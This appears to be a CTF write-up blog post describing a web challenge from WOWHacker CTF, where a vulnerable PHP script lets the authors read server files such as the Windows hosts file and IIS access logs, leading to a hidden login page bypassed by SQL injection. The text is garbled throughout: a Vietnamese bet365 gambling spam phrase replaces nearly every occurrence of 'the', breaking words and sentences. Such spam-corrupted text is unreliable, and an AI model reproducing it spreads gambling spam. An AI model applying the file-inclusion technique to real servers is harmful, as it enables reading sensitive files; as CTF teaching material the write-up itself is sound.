Web Hacking Challenge - WOWHacker CTF

This post is about challenge 8 which made gamma95 and I feel so lost when it comes to web hacking.

Challenge 8 (not accessible atm) is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 only web hacking challenge in WOWHacker's CTF. In hindsight it's not very difficult, but in fact it took us almost 1 day to solve it.

This is a classic PHP local file inclusion attack. If you set cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parameter ty and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cookie 71860c77c6745379b0d44304d66b6a13 to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same file name, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerable PHP script in challenge 8 would try to include that file. Here's what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 code looks like:
$ty = $_GET["ty"];
$page = $_COOKIE["71860c77c6745379b0d44304d66b6a13"];
if ($ty != $page)
{
echo "Error!";
}
else
{
if (include($ty) != 'OK')
{
echo "Can't find that page!";
}
}


Update: gamma95 has just noticed me this challenge may not be a PHP local file inclusion attack. Maybe it's just a vulnerable readfile call like this:
$ty = $_GET["ty"];
$page = $_COOKIE["71860c77c6745379b0d44304d66b6a13"];
if ($ty != $page)
{
echo "Error!";
}
else
{
if (file_exists($ty))
{
readfile($ty);
}
else
{
echo "Can't find that page!";
}
}
For vulnerable scripts like this, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 trick is to include files in known location which may contain important information, i.e. Apache httpd's error_log or access_log. As we knew this is a Windows machine, we tried to test our cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ory by including C:\Windows\system32\drivers\etc\hosts which worked as expected. At this point, we thought we were just moments away from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 solution of this challenge, but in fact we were totally stuck for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next several hours.

We went on to guess cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 location of Apache httpd's log files. We sent hundreds of requests, but none worked. I even downloaded and installed a copy of Apache httpd to understand its directory structure but still no luck. Why it didn't work???

Like challenge 1, it wasn't until we almost gave up on this challenge, we realized cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 simple fact: we always thought that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web server was Apache httpd while it was IIS actually! Years of abandoning Windows has brainwashed us! What a shame!

The next steps are simple. The default IIS installation would store log files in C:\WINDOWS\system32\LogFiles\W3SVC1\exYYMMDD.log. As cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 premilinary round started on 2009.08.14, we guess we should include C:\WINDOWS\system32\LogFiles\W3SVC1\ex090814.log which in turn reveals this secret script:
/tmxhffjsqkdlxmwhaWkddlsemt/answpsorltlagkrpglaemfdjttmqslek/rmfoehrufrnrdpsvntutspdy.php
This script asks for a username and password which gamma95 had bypassed it using a trivial SQL injection attack even before I figured out what I should do next. After bypassing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ntication, we obtained cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 flag which is: Do you know StolenByte???

No we don't know him, but thanks for a nice challenge!

Comments